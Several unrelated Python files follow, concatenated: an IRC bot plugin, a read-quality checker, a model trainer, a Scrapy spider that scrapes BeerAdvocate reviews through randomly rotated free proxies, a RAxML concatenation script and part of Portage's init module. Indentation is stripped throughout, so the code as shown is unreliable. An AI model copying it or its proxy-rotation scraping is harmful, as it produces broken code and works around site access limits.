explanation = self.explanations[channel]
reaction = explanation[0]
pattern = explanation[1]
nick = explanation[2]
freq = explanation[3]
irc.reply("%(person)s taught me that '%(pattern)s' was '%(reaction)s' %(frequency)f% of the time" % reaction)
else:
irc.reply("I haven't said anything yet.")
else:
reactions = self.db.getReactions(channel, text).result()
if len(reactions) == 0:
irc.reply("I have no idea what you are talking about.")
else:
reactions = map(lambda r: "%(person)s: P('%(reaction)s')=%(frequency).1f"%r, reactions)
irc.reply(("'%s' is "%(text))+', '.join(reactions))
explain = wrap(explain, ['channeldb', optional('text')])
def forget(self, irc, msg, args, channel, text):
"""[<channel>] [that] <text> OR [that] <pattern> is <text>
Asks me to forget the latest thing I said about <text>, if I can
remember what it was or you tell me. The 'that' is optional syntactic
sugar.
"""
text = re.match("(?:that )?(.+)", text).groups()[0]
definitionSplit = re.match("(.+)\s+is\s+(.+)", text)
if definitionSplit:
pattern, reaction = definitionSplit.groups()
if self.db.forgetReaction(channel, pattern, reaction).result():
irc.replySuccess()
return
if channel in self.explanations and self.explanations[channel]['pattern'] == text:
if self.db.forgetReaction(channel, text, self.explanations[channel]['reaction']):
irc.replySuccess()
return
reactions = self.db.getReactions(channel, text).result()
if len(reactions) == 1:
if self.db.forgetReaction(channel, text, reactions[0]['reaction']):
irc.replySuccess()
elif len(reactions) == 1:
irc.reply("I don't remember anything about that.")
else:
irc.reply("You'll have to be more specific about what I'm forgetting.")
forget = wrap(forget, ['channeldb', 'text'])
def doRemember(self, irc, msg, match):
r'(.+)\s+is\s+(.+)'
if not callbacks.addressed(irc.nick, msg):
return
(pattern, reaction) = match.groups()
self.log.info("Learning that '%s' means '%s'!", pattern, reaction)
channel = plugins.getChannel(msg.args[0])
msg.tag("repliedTo")
if self.db.addReaction(channel, pattern, reaction).result():
existing = self.db.getReactions(channel, pattern).result()
if len(existing) > 1:
irc.reply("I now have %d meanings for %s."%(len(existing), pattern))
else:
irc.replySuccess()
else:
irc.reply("I already knew that.")
def doPrivmsg(self, irc, msg):
if (irc.isChannel(msg.args[0])):
channel = plugins.getChannel(msg.args[0])
if (not msg.tagged("repliedTo")):
self._reply(channel, irc, msg, False)
@staticmethod
def extractTag(text):
matches = re.match("(<.+>)?(.+)", text)
if matches:
tag, text = matches.groups()
return (tag[1:-1], text)
return (None, text)
def _reply(self, channel, irc, msg, direct):
reaction = self.db.produceReaction(channel, ' '.join(msg.args[1:])).result()
self.log.info("Got reaction for %r: %r", ' '.join(msg.args[1:]), reaction)
if (reaction):
self.explanations[channel] = reaction
tag, text = self.extractTag(reaction['reaction'])
text = text.replace('$nick', msg.nick)
if tag == 'action':
irc.reply(text, action=True)
elif tag == 'reply':
irc.reply(text, prefixNick=direct)
elif tag == 'markov':
proxy = QuietNestedCommandsIrcProxy(irc, msg,
['markov', text])
if proxy.savedReply:
irc.reply(proxy.savedReply, prefixNick=direct)
else:
irc.reply("%(pattern)s is %(reaction)s" % reaction, prefixNick=direct)
return True
else:
return False
Class = Whatis
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
|
#!/usr/bin/python3
'''
'''
import pysam
from globals import *
#Assess read based on quality, alignment, sequence complexity,
class ShortReadAssessment(object):
def __init__(self, samread):
self.alignedread_=samread
self.meanphread_=sum(samread.query_qualities)/len(samread.query_qualities)
self.nuccounts_={}
atc=0
gcc=0
for i in range(len(samread.query_sequence)-1):
if samread.query_sequence[i:i+2] == "AT":
atc+=1
elif samread.query_sequence[i:i+2] == "GC":
gcc+=1
self.readlength_=len(samread.query_sequence)
self.nuccounts_["AT"]=atc
self.nuccounts_["GC"]=gcc
self.nuccounts_["A"]=samread.query_sequence.count("A")
self.nuccounts_["T"]=samread.query_sequence.count("T")
self.nuccounts_["C"]=samread.query_sequence.count("C")
self.nuccounts_["G"]=samread.query_sequence.count("G")
def is_low_complexity(self):
lc=False
if (self.nuccounts_["GC"] / self.readlength_) >= 0.89 :
lc=True
elif (self.nuccounts_["AT"] / self.readlength_) >= 0.87 :
lc=True
elif (self.nuccounts_["A"] / self.readlength_) >= 0.6 or (self.nuccounts_["T"]/self.readlength_) >= 0.6 or (self.nuccounts_["G"] / self.readlength_) >= 0.6 or (self.nuccounts_["C"]/self.readlength_) >= 0.6:
lc=True
return lc
def is_low_length(self, minlen=40):
return self.readlength_ < minlen
def is_low_confidence_alignment(self): #use match / mismatch ratio instead // hard cut off for the mismatch could be 10
lca=False
t=self.alignedread_.cigartuples
#Modify CIGAR tuples by only including the non-clipped portion of the read to calculate the mismatch / read length ratio
if t[0][0]==4 and t[0][1] <= 15:
t=t[1:]
if t[-1][0]==4 and t[-1][1] <= 15:
t=t[:-1]
curlen=0
matchlen=0
mismatch=0
for ti in t:
curlen+=ti[1]
if ti[0]==0:
matchlen+=ti[1]
elif ti[0] == 8:
mismatch+=ti[1]
# if (matchlen / curlen) < 0.7 : #not even 70 percent alignment
# lca=True
if mismatch > 10: #hard rule, 10 mismatches
lca=True
if mismatch/ curlen > 0.1: #10 percent of read is mismatching
lca=True
return lca
def is_low_phread(self, minp=20):
return self.meanphread_ <= minp
|
import argparse
import datetime
import logging
import os
import sys
from typing import List, Dict, Tuple
import torch
from torch.nn import DataParallel
from torch.optim import Optimizer
from transformers import PreTrainedModel
from transformers import PreTrainedTokenizer
from spert import util
from spert.opt import tensorboardX
SCRIPT_PATH = os.path.dirname(os.path.realpath(__file__))
class BaseTrainer:
""" Trainer base class with common methods """
def __init__(self, args: argparse.Namespace):
self.args = args
self._debug = self.args.debug
# logging
name = str(datetime.datetime.now()).replace(' ', '_')
self._log_path = os.path.join(self.args.log_path, self.args.label, name)
util.create_directories_dir(self._log_path)
if hasattr(args, 'save_path'):
self._save_path = os.path.join(self.args.save_path, self.args.label, name)
util.create_directories_dir(self._save_path)
self._log_paths = dict()
# file + console logging
log_formatter = logging.Formatter("%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s")
self._logger = logging.getLogger()
util.reset_logger(self._logger)
file_handler = logging.FileHandler(os.path.join(self._log_path, 'all.log'))
file_handler.setFormatter(log_formatter)
self._logger.addHandler(file_handler)
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setFormatter(log_formatter)
self._logger.addHandler(console_handler)
if self._debug:
self._logger.setLevel(logging.DEBUG)
else:
self._logger.setLevel(logging.INFO)
# tensorboard summary
self._summary_writer = tensorboardX.SummaryWriter(self._log_path) if tensorboardX is not None else None
self._best_results = dict()
self._log_arguments()
# CUDA devices
self._device = torch.device("cuda" if torch.cuda.is_available() and not args.cpu else "cpu")
self._gpu_count = torch.cuda.device_count()
# set seed
if args.seed is not None:
util.set_seed(args.seed)
def _add_dataset_logging(self, *labels, data: Dict[str, List[str]]):
for label in labels:
dic = dict()
for key, columns in data.items():
path = os.path.join(self._log_path, '%s_%s.csv' % (key, label))
util.create_csv(path, *columns)
dic[key] = path
self._log_paths[label] = dic
self._best_results[label] = 0
def _log_arguments(self):
util.save_dict(self._log_path, self.args, 'args')
if self._summary_writer is not None:
util.summarize_dict(self._summary_writer, self.args, 'args')
def _log_tensorboard(self, dataset_label: str, data_label: str, data: object, iteration: int):
if self._summary_writer is not None:
self._summary_writer.add_scalar('data/%s/%s' % (dataset_label, data_label), data, iteration)
def _log_csv(self, dataset_label: str, data_label: str, *data: Tuple[object]):
logs = self._log_paths[dataset_label]
util.append_csv(logs[data_label], *data)
def _save_best(self, model: PreTrainedModel, tokenizer: PreTrainedTokenizer, optimizer: Optimizer,
accuracy: float, iteration: int, label: str, extra=None):
if accuracy > self._best_results[label]:
self._logger.info("[%s] Best model in iteration %s: %s%% accuracy" % (label, iteration, accuracy))
self._save_model(self._save_path, model, tokenizer, iteration,
optimizer=optimizer if self.args.save_optimizer else None,
save_as_best=True, name='model_%s' % label, extra=extra)
self._best_results[label] = accuracy
def _save_model(self, save_path: str, model: PreTrainedModel, tokenizer: PreTrainedTokenizer,
iteration: int, optimizer: Optimizer = None, save_as_best: bool = False,
extra: dict = None, include_iteration: int = True, name: str = 'model'):
extra_state = dict(iteration=iteration)
if optimizer:
extra_state['optimizer'] = optimizer.state_dict()
if extra:
extra_state.update(extra)
if save_as_best:
dir_path = os.path.join(save_path, '%s_best' % name)
else:
dir_name = '%s_%s' % (name, iteration) if include_iteration else name
dir_path = os.path.join(save_path, dir_name)
util.create_directories_dir(dir_path)
# save model
if isinstance(model, DataParallel):
model.module.save_pretrained(dir_path)
else:
model.save_pretrained(dir_path)
# save vocabulary
tokenizer.save_pretrained(dir_path)
# save extra
state_path = os.path.join(dir_path, 'extra.state')
torch.save(extra_state, state_path)
def _get_lr(self, optimizer):
lrs = []
for group in optimizer.param_groups:
lr_scheduled = group['lr']
lrs.append(lr_scheduled)
return lrs
def _close_summary_writer(self):
if self._summary_writer is not None:
self._summary_writer.close()
|
from scrapy import Spider, Request
from beer_advocate.items import BeerRatingItem
from beer_advocate.masking_utilities import *
from lxml.html import fromstring
import pandas as pd
import numpy as np
import re, os, requests
import datetime as dt
class BABeerReviewsSpider(Spider):
name = "beer_reviews_spider"
allowed_urls = ["https://www.beeradvocate.com/"]
start_urls = ["https://www.beeradvocate.com/beer/"]
# get list of free proxies and use only elite proxies
def parse(self, response):
# set base url for all brewery profiles
base_url = "https://www.beeradvocate.com"
# import list of breweries to collect data from
beer_list_filename = "./runs/20180803/data_files/beer_list_20180803.txt"
beer_list = pd.read_csv(beer_list_filename, sep='\t')
# filter out beers that have no ratings
beer_list = beer_list.loc[beer_list['num_ratings'] >= 200,]
# narrow down list to test
#beer_list = beer_list[1:25]
#beer_list = beer_list.loc[(beer_list['num_ratings'] >= 200) & ((beer_list['num_ratings'] < 1000)),]
beer_list = beer_list.loc[(beer_list['beer_id'] == 72363),]
# get list of user_agents. for now, only use first
user_agent_list = get_user_agent_list()
user_agent = user_agent_list[0]
# generate proxy list and associated parameters
# pass in test url and user agent to return only working proxies
proxy_list = get_proxy_list(test_url=base_url, user_agent=user_agent) # get list of proxies
# set parameters for monitoring proxies
prxy_lst_updt = dt.datetime.now() # set time of last proxy list update
prxy_updt_interval = 60 # proxy refresh interval in minutes
num_proxies = len(proxy_list) # get number of proxies
dt_format = '%m/%d/%Y %H:%M:%S:%f'
# used for debugging purposes
print('Proxy list generated at: ' + prxy_lst_updt.strftime(dt_format) + '; length: ' + str(len(proxy_list)))
for beer in beer_list.iterrows():
# unpack parameters of beer
beer = beer[1]
brewery_id = beer[0]
beer_id = beer[1]
brewery_name = beer[2]
beer_name = beer[3]
beer_url = base_url + beer[4]
# check how much time has passed since proxies were refreshed
# see how much time has passed since last update
proxy_age_check_now = dt.datetime.now()
time_since_prxy_updt = proxy_age_check_now - prxy_lst_updt
print('last update: ' + prxy_lst_updt.strftime(dt_format) + '; now: ' + proxy_age_check_now.strftime(dt_format) + '; time elapsed: ' + str(time_since_prxy_updt.total_seconds()))
# refresh list if threshold has passed
if time_since_prxy_updt.total_seconds() > prxy_updt_interval*60:
proxy_list = get_proxy_list() # get list of proxies
prxy_lst_updt = dt.datetime.now() # set time of last proxy list update
num_proxies = len(proxy_list)
print('Proxy list generated at: ' + prxy_lst_updt.strftime(dt_format) + '; length: ' + str(len(proxy_list)))
# generate randon proxy
np.random.seed()
r = np.random.randint(low=0,high=num_proxies)
proxy_to_use = proxy_list.iloc[r,0]
proxy_code = proxy_list.iloc[r,1]
proxy_last_checked = proxy_list.iloc[r,2]
# print for debugging purposes
print('Proxy attempted||Review Start Page||' + str(brewery_id) + '||' + str(beer_id) + '||' + brewery_name + '||' + beer_name + '||' + '||' + proxy_to_use + '||' + proxy_code + '||' + proxy_last_checked)
yield Request(url=beer_url, headers={'User-Agent': user_agent}, meta={'user_agent': user_agent, 'brewery_id': brewery_id, 'brewery_name': brewery_name, 'beer_id': beer_id, 'beer_name': beer_name, 'beer_url': beer_url, 'proxy': proxy_to_use, 'proxy_used': proxy_to_use}, callback=self.parse_beer_review_start_page)
def parse_beer_review_start_page(self, response):
# unpack meta data
brewery_id = response.meta['brewery_id']
beer_id = response.meta['beer_id']
brewery_name = response.meta['brewery_name']
beer_name = response.meta['beer_name']
beer_url = response.meta['beer_url']
proxy = response.meta['proxy_used']
user_agent = response.meta['user_agent']
# print success msg for debugging purposes
print('Proxy successful||Review Start Page||' + str(brewery_id) + '||' + str(beer_id) + '||' + brewery_name + '||' + beer_name + '||' + '||' + proxy)
# find number of beers and generate corresponding urls
num_ratings = int(response.xpath('//*[@id="ba-content"]/div[13]/b[1]/text()').extract_first().split(': ')[1].replace(',',''))
num_per_page = 25
num_pages = (num_ratings // num_per_page) + 1
beer_ratings_urls = list(map(lambda i: beer_url + "?view=beer&sort=&start=" + str(num_per_page*i), range(0,num_pages)))
#print(beer_ratings_urls[0:10])
#beer_ratings_urls = [beer_url + "?view=beer&sort=&start=" + str(13950)]
for url in beer_ratings_urls:
start_num = str(url.split('start=')[1])
# print for debugging purposes
print('Proxy attempted||Review Page||' + str(brewery_id) + '||' + str(beer_id) + '||' + brewery_name + '||' + beer_name + '||' + start_num + '||' + proxy)
yield Request(url=url, headers={'User-Agent': user_agent}, meta={'brewery_id': brewery_id, 'brewery_name': brewery_name, 'beer_id': beer_id, 'beer_name': beer_name, 'start_num': start_num, \
'proxy': proxy, 'proxy_used': proxy}, callback=self.parse_beer_review_page)
def parse_beer_review_page(self, response):
# unpack meta data
brewery_id = response.meta['brewery_id']
beer_id = response.meta['beer_id']
brewery_name = response.meta['brewery_name']
beer_name = response.meta['beer_name']
start_num = response.meta['start_num']
proxy = response.meta['proxy_used']
# print success msg for debugging purposes
print('Proxy successful||Review Page||' + str(brewery_id) + '||' + str(beer_id) + '||' + brewery_name + '||' + beer_name + '||' + start_num + '||' + proxy)
# get container for all reviews on page
main_box = response.xpath('//*[@id="rating_fullview"]')
reviews = main_box.xpath('div[@id="rating_fullview_container"]')
for review in reviews:
rating_agg = review.xpath('div[@id="rating_fullview_content_2"]/span[@class="BAscore_norm"]/text()').extract_first()
component_ratings = review.xpath('div[@id="rating_fullview_content_2"]/span[@class="muted"]/text()')
# check if component ratings exist
if component_ratings == None:
rating_look = ''
rating_smell = ''
rating_taste = ''
rating_feel = ''
rating_overall = ''
else:
# filter out element with number of characters of the review
component_ratings = list(map(lambda s: s.replace(',',''), component_ratings.extract()))
component_ratings = list(filter(lambda s: re.search('^\d+ characters$', s) == None, component_ratings))
if component_ratings == []:
rating_look = ''
rating_smell = ''
rating_taste = ''
rating_feel = ''
rating_overall = ''
else:
component_ratings = list(map(lambda s: s.replace(' ','').split(':'),component_ratings[0].split('|')))
rating_look = component_ratings[0][1]
rating_smell = component_ratings[1][1]
rating_taste = component_ratings[2][1]
rating_feel = component_ratings[3][1]
rating_overall = component_ratings[4][1]
review_section = review.xpath('div[@id="rating_fullview_content_2"]/text()')
# check if review exists
if len(review_section) > 1:
review_text = review_section.extract()
review_text = ''.join(list(filter(lambda s: s.find('rDev')==-1, review_text)))
review_text = review_text.replace('\n','_@@_')
else:
review_text = ''
user_name = review.xpath('div[@id="rating_fullview_content_2"]/div//a/text()')[0].extract()
user_url = review.xpath('div[@id="rating_fullview_content_2"]/div//a/@href')[0].extract()
item = BeerRatingItem()
item['brewery_name'] = brewery_name
item['brewery_id'] = str(brewery_id)
item['beer_name'] = beer_name
item['beer_id'] = str(beer_id)
item['user_name'] = user_name
item['user_url'] = user_url
item['rating_agg'] = rating_agg
item['rating_look'] = rating_look
item['rating_smell'] = rating_smell
item['rating_taste'] = rating_taste
item['rating_feel'] = rating_feel
item['rating_overall'] = rating_overall
item['review'] = review_text
yield item
|
import os
import sys
import subprocess
import shutil
import fam
sys.path.insert(0, 'scripts')
sys.path.insert(0, 'tools/mappings')
import experiments as exp
import time
import saved_metrics
import ete3
import get_dico
import random
import species_analyze
import time
def build_supermatrix(datadir, subst_model, supermatrix_path, partition_path, concatenation_mode, msa_format = "phylip_relaxed"):
print("build supermatrix")
all_species = ete3.Tree(fam.get_species_tree(datadir), 1).get_leaf_names()
partition_writer = open(partition_path, "w")
offset = 1
single = (concatenation_mode == "single")
use_all_genes = (concatenation_mode == "max")
treated = 0
to_treat = len(fam.get_families_list(datadir))
columns = {}
for species in all_species:
columns[species] = []
for family in fam.get_families_list(datadir):
if (treated % 1000 == 0):
print("Building supermatrix: " + str(treated) + "/" + str(to_treat))
treated += 1
seqgroup = ete3.SeqGroup(fam.get_alignment(datadir, family))
seq_len = len(seqgroup.get_entries()[0][1])
gaps = "-" * seq_len
species_to_genes = get_dico.get_species_to_genes_family(datadir, family)
species_to_sample = {}
skip_family = False
for species in all_species:
if (species in species_to_genes):
if (single and len(species_to_genes[species]) > 1):
skip_family = True
random.shuffle(species_to_genes[species])
if (skip_family):
continue
print("Start working on family " + family)
while (len(species_to_genes) > 3):
for species in all_species:
seq = gaps
if (species in species_to_genes):
seq = seqgroup.get_seq(species_to_genes[species][-1])
species_to_genes[species].pop()
if (len(species_to_genes[species]) == 0):
del species_to_genes[species]
columns[species].append(seq)
partition_writer.write(subst_model + ", " + family + " = ")
partition_writer.write(str(offset) + "-" + str(offset + seq_len - 1))
partition_writer.write("\n")
offset += seq_len
if (not use_all_genes):
break
partition_writer.close()
print("Writing the supermatrix...")
supermatrix = ete3.SeqGroup()
print("Number of partitions:" + str(len(columns[all_species[0]])))
print("Number of sites: " + str(offset))
for species in all_species:
print("Add " + species + " to supermatrix...")
supermatrix.set_seq(species, "".join(columns[species]))
supermatrix.write(msa_format, supermatrix_path)
print("End of writing the supermatrix")
return offset
def run_raxml(subst_model, cores, run_dir, supermatrix_path, partition_path):
print("un raxml")
command = []
command.append("mpiexec")
command.append("-np")
command.append(str(cores))
command.append(exp.raxml_exec)
command.append("--search1")
command.append("--msa")
command.append(supermatrix_path)
command.append("--model")
#command.append(subst_model)
command.append(partition_path)
command.append("--prefix")
command.append(os.path.join(run_dir, "concatenation"))
command.append("--seed")
command.append("40")
command.append("--force")
command.append("--threads")
command.append("1")
FNULL = open(os.devnull, 'w')
print("running " + " ".join(command))
process = subprocess.Popen(command, stdout=subprocess.PIPE, stdin=subprocess.PIPE)
stdout, stderr = process.communicate()
def run_concatenation(datadir, concatenation_mode, subst_model, cores, additional_arguments = []):
from_scratch = not ("--continue" in additional_arguments)
run_name = "concatenation-" + concatenation_mode
run_dir = fam.get_run_dir(datadir, subst_model, run_name)
supermatrix_path = os.path.join(run_dir, "supermatrix.fasta")
partition_path = os.path.join(run_dir, "supermatrix.part")
if (from_scratch):
shutil.rmtree(run_dir, True)
os.makedirs(run_dir)
sites = build_supermatrix(datadir, subst_model, supermatrix_path, partition_path, concatenation_mode)
cores = min(cores, int(sites / 500))
start = time.time()
run_raxml(subst_model, cores, run_dir, supermatrix_path, partition_path)
time1 = (time.time() - start)
saved_metrics.save_metrics(datadir, fam.get_run_name(run_name, subst_model), time1, "runtimes")
raxml_tree = os.path.join(run_dir, "concatenation.raxml.bestTree")
dest = fam.get_species_tree(datadir, subst_model, run_name)
shutil.copy(raxml_tree, dest)
if __name__ == "__main__":
min_args_number = 5
if (len(sys.argv) < min_args_number):
print("syntax: python run_concatenation.py datadir concatenation_mode subst_model cores")
print("concatenation modes can be: ")
print("- min: randomly take ONE gene from each family and each species")
print("- max: apply min, remove the selected genes, and restart until there is not gene left")
print("- single: only take single-copy gene families")
sys.exit(1)
datadir = sys.argv[1]
concatenation_mode = sys.argv[2]
subst_model = sys.argv[3]
cores = int(sys.argv[4])
additional_arguments = sys.argv[min_args_number:]
assert(concatenation_mode in ["min", "max", "single"])
run_concatenation(datadir, concatenation_mode, subst_model, cores ,additional_arguments)
species_analyze.analyze(datadir)
|
# portage.py -- core Portage functionality
# Copyright 1998-2012 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
VERSION="2.1.11.31"
# ===========================================================================
# START OF IMPORTS -- START OF IMPORTS -- START OF IMPORTS -- START OF IMPORT
# ===========================================================================
try:
import sys
import errno
if not hasattr(errno, 'ESTALE'):
# ESTALE may not be defined on some systems, such as interix.
errno.ESTALE = -1
import re
import types
import platform
# Temporarily delete these imports, to ensure that only the
# wrapped versions are imported by portage internals.
import os
del os
import shutil
del shutil
except ImportError as e:
sys.stderr.write("\n\n")
sys.stderr.write("!!! Failed to complete python imports. These are internal modules for\n")
sys.stderr.write("!!! python and failure here indicates that you have a problem with python\n")
sys.stderr.write("!!! itself and thus portage is not able to continue processing.\n\n")
sys.stderr.write("!!! You might consider starting python with verbose flags to see what has\n")
sys.stderr.write("!!! gone wrong. Here is the information we got for this exception:\n")
sys.stderr.write(" "+str(e)+"\n\n");
raise
try:
import portage.proxy.lazyimport
import portage.proxy as proxy
proxy.lazyimport.lazyimport(globals(),
'portage.cache.cache_errors:CacheError',
'portage.checksum',
'portage.checksum:perform_checksum,perform_md5,prelink_capable',
'portage.cvstree',
'portage.data',
'portage.data:lchown,ostype,portage_gid,portage_uid,secpass,' + \
'uid,userland,userpriv_groups,wheelgid',
'portage.dbapi',
'portage.dbapi.bintree:bindbapi,binarytree',
'portage.dbapi.cpv_expand:cpv_expand',
'portage.dbapi.dep_expand:dep_expand',
'portage.dbapi.porttree:close_portdbapi_caches,FetchlistDict,' + \
'portagetree,portdbapi',
'portage.dbapi.vartree:dblink,merge,unmerge,vardbapi,vartree',
'portage.dbapi.virtual:fakedbapi',
'portage.dep',
'portage.dep:best_match_to_list,dep_getcpv,dep_getkey,' + \
'flatten,get_operator,isjustname,isspecific,isvalidatom,' + \
'match_from_list,match_to_list',
'portage.dep.dep_check:dep_check,dep_eval,dep_wordreduce,dep_zapdeps',
'portage.eclass_cache',
'portage.elog',
'portage.exception',
'portage.getbinpkg',
'portage.locks',
'portage.locks:lockdir,lockfile,unlockdir,unlockfile',
'portage.mail',
'portage.manifest:Manifest',
'portage.output',
'portage.output:bold,colorize',
'portage.package.ebuild.doebuild:doebuild,' + \
'doebuild_environment,spawn,spawnebuild',
'portage.package.ebuild.config:autouse,best_from_dict,' + \
'check_config_instance,config',
'portage.package.ebuild.deprecated_profile_check:' + \
'deprecated_profile_check',
'portage.package.ebuild.digestcheck:digestcheck',
'portage.package.ebuild.digestgen:digestgen',
'portage.package.ebuild.fetch:fetch',
'portage.package.ebuild.getmaskingreason:getmaskingreason',
'portage.package.ebuild.getmaskingstatus:getmaskingstatus',
'portage.package.ebuild.prepare_build_dirs:prepare_build_dirs',
'portage.process',
'portage.process:atexit_register,run_exitfuncs',
'portage.update:dep_transform,fixdbentries,grab_updates,' + \
'parse_updates,update_config_files,update_dbentries,' + \
'update_dbentry',
'portage.util',
'portage.util:atomic_ofstream,apply_secpass_permissions,' + \
'apply_recursive_permissions,dump_traceback,getconfig,' + \
'grabdict,grabdict_package,grabfile,grabfile_package,' + \
'map_dictlist_vals,new_protect_filename,normalize_path,' + \
'pickle_read,pickle_write,stack_dictlist,stack_dicts,' + \
'stack_lists,unique_array,varexpand,writedict,writemsg,' + \
'writemsg_stdout,write_atomic',
'portage.util.digraph:digraph',
'portage.util.env_update:env_update',
'portage.util.ExtractKernelVersion:ExtractKernelVersion',
'portage.util.listdir:cacheddir,listdir',
'portage.util.movefile:movefile',
'portage.util.mtimedb:MtimeDB',
'portage.versions',
'portage.versions:best,catpkgsplit,catsplit,cpv_getkey,' + \
'cpv_getkey@getCPFromCPV,endversion_keys,' + \
'suffix_value@endversion,pkgcmp,pkgsplit,vercmp,ververify',
'portage.xpak',
'subprocess',
'time',
)
try:
from collections import OrderedDict
except ImportError:
proxy.lazyimport.lazyimport(globals(),
'portage.cache.mappings:OrderedDict')
import portage.const
from portage.const import VDB_PATH, PRIVATE_PATH, CACHE_PATH, DEPCACHE_PATH, \
USER_CONFIG_PATH, MODULES_FILE_PATH, CUSTOM_PROFILE_PATH, PORTAGE_BASE_PATH, \
PORTAGE_BIN_PATH, PORTAGE_PYM_PATH, PROFILE_PATH, LOCALE_DATA_PATH, \
EBUILD_SH_BINARY, SANDBOX_BINARY, BASH_BINARY, \
MOVE_BINARY, PRELINK_BINARY, WORLD_FILE, MAKE_CONF_FILE, MAKE_DEFAULTS_FILE, \
DEPRECATED_PROFILE_FILE, USER_VIRTUALS_FILE, EBUILD_SH_ENV_FILE, \
INVALID_ENV_FILE, CUSTOM_MIRRORS_FILE, CONFIG_MEMORY_FILE,\
INCREMENTALS, EAPI, MISC_SH_BINARY, REPO_NAME_LOC, REPO_NAME_FILE
except ImportError as e:
sys.stderr.write("\n\n")
sys.stderr.write("!!! Failed to complete portage imports. There are internal modules for\n")
sys.stderr.write("!!! portage and failure here indicates that you have a problem with your\n")
sys.stderr.write("!!! installation of portage. Please try a rescue portage located in the\n")
sys.stderr.write("!!! portage tree under '/usr/portage/sys-apps/portage/files/' (default).\n")
sys.stderr.write("!!! There is a README.RESCUE file that details the steps required to perform\n")
sys.stderr.write("!!! a recovery of portage.\n")
sys.stderr.write(" "+str(e)+"\n\n")
raise
if sys.hexversion >= 0x3000000:
basestring = str
long = int
# We use utf_8 encoding everywhere. Previously, we used
# sys.getfilesystemencoding() for the 'merge' encoding, but that had
# various problems:
#
# 1) If the locale is ever changed then it can cause orphan files due
# to changed character set translation.
#
# 2) Ebuilds typically install files with utf_8 encoded file names,
# and then portage would be forced to rename those files to match
# sys.getfilesystemencoding(), possibly breaking things.
#
# 3) Automatic translation between encodings can lead to nonsensical
# file names when the source encoding is unknown by portage.
#
# 4) It's inconvenient for ebuilds to convert the encodings of file
# names to match the current locale, and upstreams typically encode
# file names with utf_8 encoding.
#
# So, instead of relying on sys.getfilesystemencoding(), we avoid the above
# problems by using a constant utf_8 'merge' encoding for all locales, as
# discussed in bug #382199 and bug #381509.
_encodings = {
'content' : 'utf_8',
'fs' : 'utf_8',
'merge' : 'utf_8',
'repo.content' : 'utf_8',
'stdio' : 'utf_8',
}
if sys.hexversion >= 0x3000000:
def _unicode_encode(s, encoding=_encodings['content'], errors='backslashreplace'):
if isinstance(s, str):
s = s.encode(encoding, errors)
return s
def _unicode_decode(s, encoding=_encodings['content'], errors='replace'):
if isinstance(s, bytes):
s = str(s, encoding=encoding, errors=errors)
return s
else:
def _unicode_encode(s, encoding=_encodings['content'], errors='backslashreplace'):
if isinstance(s, unicode):
s = s.encode(encoding, errors)
return s
def _unicode_decode(s, encoding=_encodings['content'], errors='replace'):
if isinstance(s, bytes):
s = unicode(s, encoding=encoding, errors=errors)
return s
class _unicode_func_wrapper(object):
"""
Wraps a function, converts arguments from unicode to bytes,
and return values to unicode from bytes. Function calls
will raise UnicodeEncodeError if an argument fails to be
encoded with the required encoding. Return values that
are single strings are decoded with errors='replace'. Return
values that are lists of strings are decoded with errors='strict'
and elements that fail to be decoded are omitted from the returned
list.
"""
__slots__ = ('_func', '_encoding')
def __init__(self, func, encoding=_encodings['fs']):
self._func = func
self._encoding = encoding
def __call__(self, *args, **kwargs):
encoding = self._encoding
wrapped_args = [_unicode_encode(x, encoding=encoding, errors='strict')
for x in args]
if kwargs:
wrapped_kwargs = dict(
(k, _unicode_encode(v, encoding=encoding, errors='strict'))
for k, v in kwargs.items())
else:
wrapped_kwargs = {}
rval = self._func(*wrapped_args, **wrapped_kwargs)
# Don't use isinstance() since we don't want to convert subclasses
# of tuple such as posix.stat_result in Python >=3.2.
if rval.__class__ in (list, tuple):
decoded_rval = []
for x in rval:
try:
x = _unicode_decode(x, encoding=encoding, errors='strict')
except UnicodeDecodeError:
pass
else:
decoded_rval.append(x)
if isinstance(rval, tuple):
rval = tuple(decoded_rval)
else:
rval = decoded_rval
else:
rval = _unicode_decode(rval, encoding=encoding, errors='replace')
return rval
class _unicode_module_wrapper(object):
"""
Wraps a module and wraps all functions with _unicode_func_wrapper.
"""
__slots__ = ('_mod', '_encoding', '_overrides', '_cache')
def __init__(self, mod, encoding=_encodings['fs'], overrides=None, cache=True):
object.__setattr__(self, '_mod', mod)
object.__setattr__(self, '_encoding', encoding)
object.__setattr__(self, '_overrides', overrides)
if cache:
cache = {}
else:
cache = None
object.__setattr__(self, '_cache', cache)
def __getattribute__(self, attr):
cache = object.__getattribute__(self, '_cache')
if cache is not None:
result = cache.get(attr)
if result is not None:
return result
result = getattr(object.__getattribute__(self, '_mod'), attr)
encoding = object.__getattribute__(self, '_encoding')
overrides = object.__getattribute__(self, '_overrides')
override = None
if overrides is not None:
override = overrides.get(id(result))
if override is not None:
result = override
elif isinstance(result, type):
pass
elif type(result) is types.ModuleType:
result = _unicode_module_wrapper(result,
encoding=encoding, overrides=overrides)
elif hasattr(result, '__call__'):
result = _unicode_func_wrapper(result, encoding=encoding)
if cache is not None:
cache[attr] = result
return result
import os as _os
_os_overrides = {
id(_os.fdopen) : _os.fdopen,
id(_os.popen) : _os.popen,
id(_os.read) : _os.read,
id(_os.system) : _os.system,
}
try:
_os_overrides[id(_os.mkfifo)] = _os.mkfifo
except AttributeError:
pass # Jython
if hasattr(_os, 'statvfs'):
_os_overrides[id(_os.statvfs)] = _os.statvfs
os = _unicode_module_wrapper(_os, overrides=_os_overrides,
encoding=_encodings['fs'])
_os_merge = _unicode_module_wrapper(_os,
encoding=_encodings['merge'], overrides=_os_overrides)
import shutil as _shutil
shutil = _unicode_module_wrapper(_shutil, encoding=_encodings['fs'])
# Imports below this point rely on the above unicode wrapper definitions.
try:
__import__('selinux')
import portage._selinux
selinux = _unicode_module_wrapper(_selinux,
encoding=_encodings['fs'])
_selinux_merge = _unicode_module_wrapper(_selinux,
encoding=_encodings['merge'])
except (ImportError, OSError) as e:
if isinstance(e, OSError):
sys.stderr.write("!!! SELinux not loaded: %s\n" % str(e))
del e
_selinux = None
selinux = None
_selinux_merge = None
# ===========================================================================
# END OF IMPORTS -- END OF IMPORTS -- END OF IMPORTS -- END OF IMPORTS -- END
# ===========================================================================
_python_interpreter = os.path.realpath(sys.executable)
